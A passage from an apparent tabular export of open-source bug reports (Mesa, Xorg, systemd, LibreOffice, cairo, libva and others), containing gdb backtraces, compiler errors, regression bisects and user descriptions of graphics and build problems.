#1  0x00007ff68352390a in emit_fetch_texels (bld=0x7fff23d798b0 inst=0x2257dc0 texel=0x7fff23d79748 is_samplei=0 '\000')
    at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2343
#2  0x00007ff68352501f in txf_emit (action=0x7fff23d7a258 bld_base=0x7fff23d798b0 emit_data=0x7fff23d796d0)
    at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2961
#3  0x00007ff68355e75e in lp_build_tgsi_inst_llvm (bld_base=0x7fff23d798b0 inst=0x2257dc0) at src/gallium/auxiliary/gallivm/lp_bld_tgsi.c:265
#4  0x00007ff68355ef71 in lp_build_tgsi_llvm (bld_base=0x7fff23d798b0 tokens=0x21dd710) at src/gallium/auxiliary/gallivm/lp_bld_tgsi.c:476
#5  0x00007ff683526bca in lp_build_tgsi_soa (gallivm=0x1e780f0 tokens=0x21dd710 type=... mask=0x7fff23d7f4d0 consts_ptr=0x2255228 
    const_sizes_ptr=0x2255308 system_values=0x7fff23d7f4b0 inputs=0x7fff23d810a0 outputs=0x7fff23d7f590 sampler=0x224e700 info=0x21d0bb0 
    gs_iface=0x0) at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:3788
#6  0x00007ff6830cfd8d in generate_fs_loop (gallivm=0x1e780f0 shader=0x21d0a90 key=0x21dc560 builder=0x21d6010 type=... 
    context_ptr=0x224ddd0 num_loop=0x224e400 interp=0x7fff23d80370 sampler=0x224e700 mask_store=0x224f3f8 out_color=0x7fff23d7fe70 
    depth_ptr=0x224e050 depth_stride=0x224e190 facing=0x224dec0 thread_data_ptr=0x224e0f0) at src/gallium/drivers/llvmpipe/lp_state_fs.c:417
#7  0x00007ff6830d61e9 in generate_fragment (lp=0x1dbdf50 shader=0x21d0a90 variant=0x21dc560 partial_mask=1)
    at src/gallium/drivers/llvmpipe/lp_state_fs.c:2363
#8  0x00007ff6830d71dc in generate_variant (lp=0x1dbdf50 shader=0x21d0a90 key=0x7fff23d81640) at src/gallium/drivers/llvmpipe/lp_state_fs.c:2615
#9  0x00007ff6830d881f in llvmpipe_update_fs (lp=0x1dbdf50) at src/gallium/drivers/llvmpipe/lp_state_fs.c:3166
#10 0x00007ff6830ce609 in llvmpipe_update_derived (llvmpipe=0x1dbdf50) at src/gallium/drivers/llvmpipe/lp_state_derived.c:186
#11 0x00007ff6830a8ca0 in llvmpipe_draw_vbo (pipe=0x1dbdf50 info=0x7fff23d81960) at src/gallium/drivers/llvmpipe/lp_draw_arrays.c:64
#12 0x00007ff683445ea3 in cso_draw_vbo (cso=0x1e51a70 info=0x7fff23d81960) at src/gallium/auxiliary/cso_cache/cso_context.c:1428
#13 0x00007ff683253e6b in st_draw_vbo (ctx=0x7ff6868c8010 prims=0x7fff23d81a30 nr_prims=1 ib=0x0 index_bounds_valid=1 '\001' min_index=0 
    max_index=3 tfb_vertcount=0x0 indirect=0x0) at src/mesa/state_tracker/st_draw.c:276
#14 0x00007ff68332cc0b in vbo_draw_arrays (ctx=0x7ff6868c8010 mode=6 start=0 count=4 numInstances=1 baseInstance=0)
    at src/mesa/vbo/vbo_exec_array.c:667
#15 0x00007ff68332d656 in vbo_exec_DrawArrays (mode=6 start=0 count=4) at src/mesa/vbo/vbo_exec_array.c:819
#16 0x00007ff6863ed09e in stub_glDrawArrays (mode=6 first=0 count=4) at piglit/tests/util/generated_dispatch.c:6274
#17 0x000000000040152d in draw_rect_core (x=-1 y=-1 w=1 h=1) at piglit/tests/spec/gl-3.2/glsl-resource-not-bound.c:116
#18 0x000000000040155a in piglit_display () at piglit/tests/spec/gl-3.2/glsl-resource-not-bound.c:126
#19 0x00007ff6863de7e2 in display () at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:60
#20 0x00007ff685b76244 in fghRedrawWindow (window=0x1dba490) at freeglut_main.c:231
#21 fghcbDisplayWindow (window=0x1dba490 enumerator=0x7fff23d81bf0) at freeglut_main.c:248
#22 0x00007ff685b79aa9 in fgEnumWindows (enumCallback=enumCallback@entry=0x7ff685b761d0  
    enumerator=enumerator@entry=0x7fff23d81bf0) at freeglut_structure.c:396
#23 0x00007ff685b767fd in fghDisplayAll () at freeglut_main.c:271
#24 glutMainLoopEvent () at freeglut_main.c:1523
#25 0x00007ff685b76ffd in glutMainLoop () at freeglut_main.c:1571
#26 0x00007ff6863deac4 in run_test (gl_fw=0x7ff6866cd380  argc=2 argv=0x7fff23d81fc8)
    at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:154
#27 0x00007ff6863dc819 in piglit_gl_test_run (argc=2 argv=0x7fff23d81fc8 config=0x7fff23d81e90)
    at piglit/tests/util/piglit-framework-gl.c:151
#28 0x0000000000401060 in main (argc=2 argv=0x7fff23d81fc8) at piglit/tests/spec/gl-3.2/glsl-resource-not-bound.c:32
(gdb) frame 1
#1  0x00007ff68352390a in emit_fetch_texels (bld=0x7fff23d798b0 inst=0x2257dc0 texel=0x7fff23d79748 is_samplei=0 '\000')
    at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2343
2343	      assert(0)
(gdb) l
2338	      break
2339	   case TGSI_TEXTURE_3D:
2340	      dims = 3
2341	      break
2342	   default:
2343	      assert(0)
2344	      return
2345	   }
2346	
2347	   /* always have lod except for buffers ? */
(gdb) print target
$1 = 14
src/gallium/include/pipe/p_shader_tokens.h
   534  #define TGSI_TEXTURE_BUFFER         0
   535  #define TGSI_TEXTURE_1D             1
   536  #define TGSI_TEXTURE_2D             2
   537  #define TGSI_TEXTURE_3D             3
   538  #define TGSI_TEXTURE_CUBE           4
   539  #define TGSI_TEXTURE_RECT           5
   540  #define TGSI_TEXTURE_SHADOW1D       6
   541  #define TGSI_TEXTURE_SHADOW2D       7
   542  #define TGSI_TEXTURE_SHADOWRECT     8
   543  #define TGSI_TEXTURE_1D_ARRAY       9
   544  #define TGSI_TEXTURE_2D_ARRAY       10
   545  #define TGSI_TEXTURE_SHADOW1D_ARRAY 11
   546  #define TGSI_TEXTURE_SHADOW2D_ARRAY 12
   547  #define TGSI_TEXTURE_SHADOWCUBE     13
   548  #define TGSI_TEXTURE_2D_MSAA        14
   549  #define TGSI_TEXTURE_2D_ARRAY_MSAA  15
   550  #define TGSI_TEXTURE_CUBE_ARRAY     16
   551  #define TGSI_TEXTURE_SHADOWCUBE_ARRAY 17
   552  #define TGSI_TEXTURE_UNKNOWN        18
   553  #define TGSI_TEXTURE_COUNT          19</t>
  </si>
  <si>
    <t>SYSTEMD-88645</t>
  </si>
  <si>
    <t>MSG: nspawn: improve error text if --template= is used with non-btrfs file system</t>
  </si>
  <si>
    <t>Kernel: 3.18.2 with btrfs builtin
systemd git 72521ab
rootfs of host: ext4
Running
systemd-nspawn -b -D /media/test-intra --template=/media/centos7-base
fails with:
Couldn't create snapshot /media/test-intra from /media/centos7-base: Inappropriate ioctl for device
This looks to me like systemd-nspawn doesn't verify whether the FS providing -D is btrfs or not and just blindly tries to create a btrfs snapshot on top of it.
IMHO this needs at least to be handled a bit more graceful - letting the user know what's the problem.
Besides that if there's no sane way to create a btrfs snapshot (e.g. using an image file) on top of another filesystem this should be made clear in the systemd-nspawn manpage.</t>
  </si>
  <si>
    <t>XORG-4899</t>
  </si>
  <si>
    <t>CapsLock stops work as group switcher in Xorg</t>
  </si>
  <si>
    <t>This config not works anymore under FreeBSD 6-7:
    Option XkbRules   xorg
    Option XkbModel   pc105
    Option XkbLayout  usru
    Option XkbOptions grp:caps_toggle
Shift+CapsLock not works either (as group switcher). When I change last line to
    Option XkbOptions  grp:toggle
(i.e. Right Alt instead of CapsLock) it works but I want CapsLock because it 
is FreeBSD default for non-X mode. 
Please fix.</t>
  </si>
  <si>
    <t>ache</t>
  </si>
  <si>
    <t>PIGLIT-91151</t>
  </si>
  <si>
    <t>[bisected] spec.ext_framebuffer_multisample.alpha-to-coverage-dual-src-blend fails</t>
  </si>
  <si>
    <t>with piglit 44456ba
spec.ext_framebuffer_multisample.alpha-to-coverage-dual-src-blend
fails for the 246 and 8 variants.  The test regresses on bdw bsw
byt hsw ivb skl and snb.  Sample test output below:
/tmp/build_root/m64/lib/piglit/bin/ext_framebuffer_multisample-alpha-to-coverage-dual-src-blend 8 -auto -fbo
Probe color at (030)
  Expected: 0.015542 0.540720 0.003562 0.355078
  Observed: 0.015686 0.600000 0.003922 0.396078
Probe color at (060)
  Expected: 0.022253 0.469956 0.007782 0.328125
  Observed: 0.023529 0.564706 0.007843 0.388235
Probe color at (090)
  Expected: 0.006639 0.478194 0.123930 0.330859
  Observed: 0.007843 0.576471 0.121569 0.396078
Probe color at (0120)
  Expected: 0.193928 0.624989 0.191135 0.375000
  Observed: 0.192157 0.698039 0.188235 0.423529
Probe color at (0150)
  Expected: 0.340842 0.506519 0.016304 0.472266
  Observed: 0.341176 0.529412 0.015686 0.486275
Probe color at (0180)
  Expected: 0.065178 0.331757 0.207457 0.634375
  Observed: 0.062745 0.274510 0.207843 0.596078
Probe color at (0210)
  Expected: 0.183156 0.854469 0.762897 0.873047
  Observed: 0.180392 0.690196 0.760784 0.764706
Probe color at (0240)
  Expected: 0.960013 1.000000 0.486724 1.000000
  Observed: 0.960784 0.913726 0.486275 1.000000</t>
  </si>
  <si>
    <t>LIBREOFFICE-82078</t>
  </si>
  <si>
    <t>FILEOPEN: RTF bold text spilling over to non-bold text</t>
  </si>
  <si>
    <t>Created attachment 103889
Word 2013 VS LibO 4.3.1
Steps:
1) Open attachment 103815 in Word 2013 and convert to RTF else open 
2) Scroll down to page 28
3) See that the bold text 'Connect. This will open a remote'
4) The bold attribute was only set to 'Connect.'
Tested in 4.3.1 4.2.5 and 3.3.0. It seems that because the period is in bold its not stopping the bold from continuing. You can see other bold text on the page which has a period following it but the period in those cases isnt bold.</t>
  </si>
  <si>
    <t>LIBREOFFICE-70725</t>
  </si>
  <si>
    <t>Calc export to PDF shows !!br0ken!! instead of values</t>
  </si>
  <si>
    <t>Using Version: 4.2.0.0.alpha0+
Build ID: 051731bbcaa79b6428c8ebee6c114c9b28220cc8
TinderBox: Linux-rpm_deb-x86_64@46-TDF Branch:master Time: 2013-10-21_01:09:11
Step to reproduce:
- fill some data in a new spreadsheet
- export to pdf
- open the new pdf generated
--&gt; instead of the data !!brOken!! is shown for each of them
Sophie</t>
  </si>
  <si>
    <t>CAIRO-84908</t>
  </si>
  <si>
    <t>Compilation errors with MSVC after recent changes to 'cairo-path-stroke-traps.c'</t>
  </si>
  <si>
    <t>Firstly apologies. I'm not sure whether this needs to get filed under 'general' or under 'win32-backend' but anyway here it is...
Since updating from git master about a week ago (ver 1.13.1) I can no longer compile 'cairo-path-stroke-traps.c' with Microsoft VC8. I get errors at lines 302 303 464 and 465. As an example line 302 looks like this:-
cairo_point_t t[] = { in-&gt;point *inpt *outpt }
Given that 'in-&gt;point' '*inpt' and '*outpt' are all structs I suspect the problem is that the compiler would need to generate a default copy c'tor for 'cairo_point_t'. MSVC does this when compiling as C++ but not when compiling as 'C'. Unfortunately if I change my project to build as C++ I just get a whole slew of other errors elsewhere. So currently I can't compile as 'C' nor as C++.
The errors at lines 302 and 303 can be fixed as follows. I'm not claiming that my fix is the most elegant one (and of course somebody will need to verify that it fulfils the original intention) but it does at least compile!! If somebody wants to come up with a more elegant solution this should at least tell them what's going wrong:-
1) Remove lines 302 and 303 and replace with the following code:-
cairo_point_t t[3]
cairo_point_t e[4]
memcpy( 
memcpy( 
memcpy( 
memcpy( 
memcpy( 
memcpy( 
memcpy( 
2) It looks like the same fix would probably work for lines 464 and 465.
Hope that helps
John</t>
  </si>
  <si>
    <t>johne53</t>
  </si>
  <si>
    <t>TELEPATHY-50008</t>
  </si>
  <si>
    <t>telephaty-idle crashed with SIGSEGV in g_simple_async_result_complete()</t>
  </si>
  <si>
    <t>I'm in ubuntu 12.04 in gnome-shell and I have this error always that the connection from internet is lost and some more times without any cause.
Package telephaty-idle 0.1.11-2</t>
  </si>
  <si>
    <t>carlos.soriano89</t>
  </si>
  <si>
    <t>XORG-22086</t>
  </si>
  <si>
    <t>x restarts with intel driver 2.7.99 / UXA/DRI with kernel 2.6.30 rc8</t>
  </si>
  <si>
    <t>X restarts when a video is made to play in full scrren using totem. It also seems to randomly restart every now an then.
here is the system log message.
kernel: [ 4634.444760] [drm:i915_get_vblank_counter] *ERROR* trying to get vblank count for disabled pipe 1
 gdm[6356]: WARNING: gdm_slave_xioerror_handler: Fatal X error - Restarting :0 
here is the kernel log message.
 [ 4634.444760] [drm:i915_get_vblank_counter] *ERROR* trying to get vblank count for disabled pipe 1
kernel: [ 4636.432266] [drm:i915_setparam] *ERROR* unknown parameter 4
kernel: [ 4636.432303] [drm:i915_getparam] *ERROR* Unknown parameter 6</t>
  </si>
  <si>
    <t>anantharumugam</t>
  </si>
  <si>
    <t>DBUS-103015</t>
  </si>
  <si>
    <t>versioninfo.o is not added to target libdbus-1 on Windows</t>
  </si>
  <si>
    <t>Just detected with running 'make --trace' that in dbus subdir versioninfo.rc
is not add versioninfo.o to libdbus_1 target.</t>
  </si>
  <si>
    <t>MESA-39017</t>
  </si>
  <si>
    <t>[bisected] Segfault in Gallium drivers in Mupen64Plus</t>
  </si>
  <si>
    <t>With the current git master and any Gallium driver trying to play any game in Mupen64Plus (with its default video plugin) results in a segfault almost immediately when the driver tries to draw or validate VBOs.  I've confirmed this on softpipe llvmpipe and nv50.
I've bisected the regression to this commit:
commit 12fa91b6753dccbd3aa12c570d1f1e55c7dc0582
Author: Thomas Hellstrom 
Date:   Mon Mar 7 11:24:43 2011 +0100
    st/mesa: Fix an incorrect user vertex buffer reference
    st-&gt;user_vb[attr] was always pointing to the same user vb regardless
    of the value of attr. Together with reverting the temporary workaround
    for bug 34378 and a fix in the svga driver this fixes googleearth on svga.
Reverting only the second part of that commit fixes the issue in master although that looks like more of a workaround than a proper fix.</t>
  </si>
  <si>
    <t>PULSEAUDIO-93623</t>
  </si>
  <si>
    <t>[PATCH] rtpoll: Fix build error when building with DEBUG_TIMING</t>
  </si>
  <si>
    <t>Created attachment 120855
[PATCH] rtpoll: Fix typo because of build error when DEBUG_TIMING is defined
Build error is occured when building with DEBUG_TIMING in rtpoll.c
So I attached a patch please review it.
Thank you.</t>
  </si>
  <si>
    <t>jungsup4.lee</t>
  </si>
  <si>
    <t>XORG-22232</t>
  </si>
  <si>
    <t>xkb unable to map key</t>
  </si>
  <si>
    <t>I'm not sure which component affected to my bug report for first lets attach it to xkeyboard-confg package :)
I have notebook Macbook Pro with linux on board it works perfectly except some small issues. One issue related to keyboard. That is default keys map is not so good.
You can check how Macbook Pro keyboard look like:
http://support.apple.com/kb/HT1220
As normal usage i prefer to have several keys map. I prefer to switch 'Left Alt' key with 'Left Windows Key' (Super_L) map small enter key (KPEN) with 'Delete' key and either Eject to Print key.
Here the list:
- Super_L to Alt_L
- Alt_L to Super_L
- KP_Enter to Delete
- Eject to Print
First two rules can be done easily by using Layout options in gnome-keyboard-property application.
For two last rules i made my own Layout options. I map enter to delete key with no problems. But when i made rules for Eject key it wont work.
When i press Eject key it appear as Print key in xev application. My gnome keyboard shortcut set to run print screen application. But when i press eject key on my workspace noting happens.
I also tried to map other key to check if it my fault or not. When i map KP_Enter to Print key everything works fine. But when i map Eject to Print noting going to work.
In my opinion here bug in X11 but i do not know where it is.
Here is my patch for it.</t>
  </si>
  <si>
    <t>XORG-25083</t>
  </si>
  <si>
    <t>Cannot enable Xorg server zapping.</t>
  </si>
  <si>
    <t>The Xorg man page says
  [Zapping] can be enabled with the -retro command line or by setting the
   DontZap xorg.conf(5) file option to a FALSE value.
However if I pass -retro I get the ordinary background pattern yet pressing ctrl+alt+backspace does not kill the server.  Furthermore adding Option DontZap False to the ServerFlags section in my xorg.conf does not enable zapping either with or without the -retro option.
This appears to be the case with all server versions since (at least) 1.6.3.</t>
  </si>
  <si>
    <t>MESA-31643</t>
  </si>
  <si>
    <t>Heroes of Newerth - Units and buildings (all animations) became invisible</t>
  </si>
  <si>
    <t>Hello there I have the following issue.
I passed from debian sid (mesa 7.7) to ubuntu 10.10 64bit (mesa 7.9dev)
I own a Vaio TT with an integrated intel card.
direct rendering: Yes
server glx vendor string: SGI
server glx version string: 1.4
server glx extensions:
client glx vendor string: Mesa Project and SGI
client glx version string: 1.4
client glx extensions:
OpenGL vendor string: Tungsten Graphics Inc
OpenGL renderer string: Mesa DRI Mobile IntelÂ® GM45 Express Chipset GEM 20100330 DEVELOPMENT 
OpenGL version string: 2.1 Mesa 7.9-devel
OpenGL shading language version string: 1.20
OpenGL extensions:
    GL_3DFX_texture_compression_FXT1 GL_APPLE_client_storage 
00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07)
Linux teo-vaio 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:32:27 UTC 2010 x86_64 GNU/Linux
Here a photo of the bug to clearly show that all the animations became invisible:
http://i55.tinypic.com/ofu5qe.png
I never had any issues since the game went out so I guess there has been a regression or a bug in the latest versions of mesa (also the 7.10 git has the same issue).
I already tried to reinstall ubuntu reinstall the game update the kernel the intel driver and mesa to the latest version available all without success.
I hope you can understand what this bug is.
Regards</t>
  </si>
  <si>
    <t>ilcontegis</t>
  </si>
  <si>
    <t>CAIRO-16496</t>
  </si>
  <si>
    <t>Failing run autogen.sh with new autoconf and libtool</t>
  </si>
  <si>
    <t>Hi there.
I use cairo-git. Some time ago I upgrade system autoconf and libtool to 2.62 and 2.24 versions respectively (I need them to compile freetype2-cvs :)). But after that I cannot run autogen.sh:
================================== Log ========================================
using autoconf for autoconf
checking for automake &gt;= 1.8...
  testing automake... found 1.10.1
using libtoolize for libtool
./autogen.sh:   Note: `./configure' will be run with no arguments.
                If you wish to pass any to it please specify them on the
                `./autogen.sh' command line.
./autogen.sh: running `libtoolize --copy --force'
libtoolize: putting auxiliary files in `.'.
libtoolize: copying file `./ltmain.sh'
libtoolize: You should add the contents of the following files to `aclocal.m4':
libtoolize:   `/usr/share/aclocal/libtool.m4'
libtoolize:   `/usr/share/aclocal/ltoptions.m4'
libtoolize:   `/usr/share/aclocal/ltversion.m4'
libtoolize:   `/usr/share/aclocal/ltsugar.m4'
libtoolize:   `/usr/share/aclocal/lt~obsolete.m4'
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.in and
libtoolize: rerunning libtoolize to keep the correct libtool macros in-tree.
libtoolize: Consider adding `-I m4' to ACLOCAL_AMFLAGS in Makefile.am.
./autogen.sh: running `aclocal'
/usr/share/aclocal/nspr.m4:8: warning: underquoted definition of AM_PATH_NSPR
/usr/share/aclocal/nspr.m4:8:   run info '(automake)Extending aclocal'
/usr/share/aclocal/nspr.m4:8:   or see http://sources.redhat.com/automake/automake.html#Extending-aclocal
./autogen.sh: running `autoheader'
./autogen.sh: running `automake --add-missing --foreign'
configure.in:64: installing `./config.guess'
configure.in:64: installing `./config.sub'
configure.in:22: installing `./install-sh'
configure.in:22: installing `./missing'
boilerplate/Makefile.am: installing `./depcomp'
./autogen.sh: running `autoconf'
configure.in:29: error: possibly undefined macro: LT_CURRENT
      If this token and others are legitimate please use m4_pattern_allow.
      See the Autoconf documentation.
configure.in:33: error: possibly undefined macro: LT_REVISION
configure.in:38: error: possibly undefined macro: LT_AGE
================================== Log ========================================
I added
m4_pattern_allow([[LT_]+])
into configure.in but then I stuck on
===========================================================================
[...]
configure: updating cache config.cache
configure: error: conditional am__fastdepCXX was never defined.
Usually this means the macro was only invoked conditionally.
===========================================================================
I think something changed in autoconf-automake-libtool bundle (versions: 2.62 1.10.1 2.2.4) then autogen.sh can help to warning about not supported version of auto* - libtool.</t>
  </si>
  <si>
    <t>LoMoVP</t>
  </si>
  <si>
    <t>XORG-45672</t>
  </si>
  <si>
    <t>sna_pixmap_move_to_gpu: Assertion `pixmap-&gt;devPrivate.ptr != ((void *)0)' failed.</t>
  </si>
  <si>
    <t>Created attachment 56646
Backtrace of crash with --enable-debug=full (unpacked: 96MB)
When sending a chat message to a contact in amsn (http://www.amsn-project.net/) an assertion is triggered:
X: /var/tmp/portage/x11-drivers/xf86-video-intel-9999/work/xf86-video-intel-9999/src/sna/sna_accel.c:2146: sna_pixmap_move_to_gpu: Assertion `pixmap-&gt;devPrivate.ptr != ((void *)0)' failed.
using xf86-video-intel with sna at commit a8ed1a02ada1f8d2f910dfefb150d26c840bf9ea .
My hardware is Dell XPS 15 (L502x) with:
00:02.0 VGA compatible controller: Intel Corporation Device 0116 (rev 09)
[    13.803] (II) intel(0): Integrated Graphics Chipset: Intel(R) Sandybridge
Mobile (GT2)</t>
  </si>
  <si>
    <t>MESA-61199</t>
  </si>
  <si>
    <t>mapi/glapi/glprocs.h:2573:5: error: â€˜glDiscardFramebufferEXTâ€™ undeclared here (not in a function)</t>
  </si>
  <si>
    <t>mesa: 54d9c8a04a3d79da9a73f4b30d1c30874e05dc58 (master)
$ scons
[...]
  Compiling src/mapi/glapi/glapi_getproc.c ...
In file included from src/mapi/glapi/glapi_getproc.c:48:0:
build/linux-x86_64-debug/mapi/glapi/glprocs.h:2573:5: error: â€˜glDiscardFramebufferEXTâ€™ undeclared here (not in a function)
scons: *** [build/linux-x86_64-debug/mapi/glapi/glapi_getproc.os] Error 1
413941e1a3155b29a190ab7ecfd844b1a5c2e460 is the first bad commit
commit 413941e1a3155b29a190ab7ecfd844b1a5c2e460
Author: Tapani PÃ¤lli 
Date:   Mon Feb 18 09:12:27 2013 +0200
    gles2: a stub implementation for GL_EXT_discard_framebuffer
    This patch implements a stub for GL_EXT_discard_framebuffer with
    required checks listed by the extension specification. This extension
    is required by GLBenchmark 2.5 when compiled with OpenGL ES 2.0
    as the rendering backend.
    Signed-off-by: Tapani PÃ¤lli 
    Reviewed-by: Brian Paul 
    Reviewed-and-tested-by: Chad Versace 
:040000 040000 64d7ddf0d1ed196500fc5e66a2bd7f5b4c28867a 6d191998124450cc5cd16aac8c767d254dc74688 M      src
bisect run success</t>
  </si>
  <si>
    <t>XORG-18902</t>
  </si>
  <si>
    <t>xorg-server 1.5.99.2 fails to compile unless --disable-dri2 is specified</t>
  </si>
  <si>
    <t>Compiling xorg-server 1.5.99.2 without --disable-dri2 (dri2proto 1.99.3 and libdrm 2.4.1 are installed) results in
glxdri2.c:72: error: expected ':' '' '' '}' or '__attribute__' before '*' token
glxdri2.c:93: error: expected specifier-qualifier-list before '__DRIbuffer'
glxdri2.c: In function '__glXDRIbindTexImage':
glxdri2.c:215: error: '__GLXDRIscreen' has no member named 'texBuffer'
glxdri2.c: In function '__glXDRIscreenCreateContext':
glxdri2.c:304: error: '__GLXDRIscreen' has no member named 'dri2'
glxdri2.c: In function '__glXDRIscreenCreateDrawable':
glxdri2.c:347: error: '__GLXDRIscreen' has no member named 'dri2'
glxdri2.c: At top level:
glxdri2.c:353: error: expected '=' '' '' 'asm' or '__attribute__' before '*' token
glxdri2.c:386: error: expected '=' '' '' 'asm' or '__attribute__' before 'loaderExtension'
glxdri2.c:393: error: 'loaderExtension' undeclared here (not in a function)
glxdri2.c: In function 'initializeExtensions':
glxdri2.c:436: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:437: warning: passing argument 1 of '__glXEnableExtension' from incompatible pointer type
glxdri2.c:443: error: '__GLXDRIscreen' has no member named 'swapControl'
glxdri2.c:444: warning: statement with no effect
glxdri2.c:445: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:446: warning: passing argument 1 of '__glXEnableExtension' from incompatible pointer type
glxdri2.c:447: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:448: warning: passing argument 1 of '__glXEnableExtension' from incompatible pointer type
glxdri2.c:456: error: '__GLXDRIscreen' has no member named 'texBuffer'
glxdri2.c:457: warning: statement with no effect
glxdri2.c: In function '__glXDRIscreenProbe':
glxdri2.c:496: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:496: warning: passing argument 1 of '__glXInitExtensionEnableBits' from incompatible pointer type
glxdri2.c:520: error: '__DRI_DRI2' undeclared (first use in this function)
glxdri2.c:520: error: (Each undeclared identifier is reported only once
glxdri2.c:520: error: for each function it appears in.)
glxdri2.c:520: warning: passing argument 1 of 'strlen' from incompatible pointer type
glxdri2.c:520: warning: passing argument 2 of '__builtin_strcmp' from incompatible pointer type
glxdri2.c:520: warning: passing argument 2 of '__builtin_strcmp' from incompatible pointer type
glxdri2.c:520: warning: passing argument 1 of 'strlen' from incompatible pointer type
glxdri2.c:520: warning: passing argument 2 of '__builtin_strcmp' from incompatible pointer type
glxdri2.c:520: warning: passing argument 2 of '__builtin_strcmp' from incompatible pointer type
glxdri2.c:521: error: '__DRI_DRI2_VERSION' undeclared (first use in this function)
glxdri2.c:521: warning: comparison between pointer and integer
glxdri2.c:522: error: '__GLXDRIscreen' has no member named 'dri2'
glxdri2.c:522: error: expected ')' before '__DRIdri2Extension'
glxdri2.c:522: warning: type defaults to 'int' in declaration of 'type name'
glxdri2.c:522: warning: statement with no effect
glxdri2.c:526: error: '__GLXDRIscreen' has no member named 'dri2'
glxdri2.c:533: error: '__GLXDRIscreen' has no member named 'dri2'
glxdri2.c:533: error: request for member 'createNewScreen' in something not a structure or union
glxdri2.c:537: error: called object '*(const struct __DRIextension **)&amp;' is not a function
glxdri2.c:537: warning: assignment from incompatible pointer type
glxdri2.c:551: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:551: warning: passing argument 1 of '__glXGetExtensionString' from incompatible pointer type
glxdri2.c:558: error: '__GLXDRIscreen' has no member named 'glx_enable_bits'
glxdri2.c:559: warning: passing argument 1 of '__glXGetExtensionString' from incompatible pointer type
make[1]: *** [glxdri2.lo] Error 1
With --disable-dri2 everything is ok dri1 works.</t>
  </si>
  <si>
    <t>LIBVA-79848</t>
  </si>
  <si>
    <t>vaDeriveImage returns wrong fourcc after having created a vpp context</t>
  </si>
  <si>
    <t>I run postprocessing on a different thread than decoding. On init I test what deinterlacing methods are available. In order to achieve this I need to create a vpp context. see here: https://github.com/FernetMenta/xbmc/blob/vpp/xbmc/cores/dvdplayer/DVDCodecs/Video/VAAPI.cpp#L2234
For testing some other option I create a derived image:
https://github.com/FernetMenta/xbmc/blob/vpp/xbmc/cores/dvdplayer/DVDCodecs/Video/VAAPI.cpp#L2659
The image reports YUY2 instead of NV12 which is wrong. bits_per_pixel is 12. If this occurs I get video corruption on all vpp deinterlacing methods. progressive is ok.
If I skip testing deriveImage all is ok. (apart from not working madi/maci)
If I test deriveImage prior to opening the vpp context the first time it works as well. (no madi/maci)
Looks like something corrupts internal state of libva.</t>
  </si>
  <si>
    <t>fernetmenta</t>
  </si>
  <si>
    <t>DRI-109662</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@gem_exec_schedule@* - fail - Failed assertion: result(_read)? == ctx...</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5613/shard-glk1/igt@gem_exec_schedule@promotion-bsd.html
Starting subtest: promotion-bsd
(gem_exec_schedule:10027) CRITICAL: Test assertion failure function promotion file ../tests/i915/gem_exec_schedule.c:408:
(gem_exec_schedule:10027) CRITICAL: Failed assertion: result_read == ctx[2]
(gem_exec_schedule:10027) CRITICAL: error: 0 != 0x3
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5616/shard-glk9/igt@gem_exec_schedule@out-order-blt.html
Starting subtest: out-order-blt
(gem_exec_schedule:1538) CRITICAL: Test assertion failure function reorder file ../tests/i915/gem_exec_schedule.c:355:
(gem_exec_schedule:1538) CRITICAL: Failed assertion: result == ctx[0]
(gem_exec_schedule:1538) CRITICAL: error: 0 != 0x1</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-96404</t>
  </si>
  <si>
    <t>Add amdgpu-pro driver to bugzilla componets</t>
  </si>
  <si>
    <t>Under Product: DRI
please add:
DRM/AMDgpu-pro
Under Product: xorg
please add:
Driver/AMDgpu-pro</t>
  </si>
  <si>
    <t>POLICYKIT-92566</t>
  </si>
  <si>
    <t>Typos in pkcheck man file</t>
  </si>
  <si>
    <t>Created attachment 119028
Fix man page typos
Hi
I noticed some typos in the man page for pkcheck (octects specificied etc). The attached patch fixes them.
Regards
Anders Jonsson</t>
  </si>
  <si>
    <t>MESA-23553</t>
  </si>
  <si>
    <t>[945G v2.8* driver] Tiling problems</t>
  </si>
  <si>
    <t>Created attachment 28949
Xorg.0.log
Bug description:
When using pymol[1] the graphics get worse after a second not touching the program.
picture:
http://dev.gentooexperimental.org/~jlec/paste/pymol.png
bad video:
http://dev.gentooexperimental.org/~jlec/paste/screen.mpg
This can be overcome with setting Option Tiling false so I think it is really related to Tiling.
System environment:
-- chipset: 945G
-- system architecture: 32bit
-- xf86-video-intel: 2.8.1 but it is the same since 2.7.9
-- xserver: 1.6.3.901 but the same in 1.6* at least.
-- mesa: 7.5
-- libdrm: 2.4.12
-- kernel: 2.6.30-gentoo-r4 but also with 2.6.29* and latest git sources
-- Linux distribution: gentoo
-- Machine or mobo model: desktop
-- Display connector: vga
Reproducing steps:
- Install pymol [1]
- fetch 3cwg
- wait a second
Additional info:
none
[1]
www.pymol.org</t>
  </si>
  <si>
    <t>jlec</t>
  </si>
  <si>
    <t>LIBVA-67190</t>
  </si>
  <si>
    <t>[gst-vaapi] H264 video playback regression between 5fe72d9 and 0.5.5</t>
  </si>
  <si>
    <t>gstreamer-vaapi has stopped playing back h/w accelerated video on Wayland 1.2. At this point it's not known where the regression has occurred-- I assume it's either gstreamer-vaapi or intel-driver. Analysis/bisect will take some time insights or ideas are always welcome.
SETUP:
  * Build wayland 1.2 libva intel-driver gstreamer's 1.0 branch and gstreamer-vaapi
  * Test video:
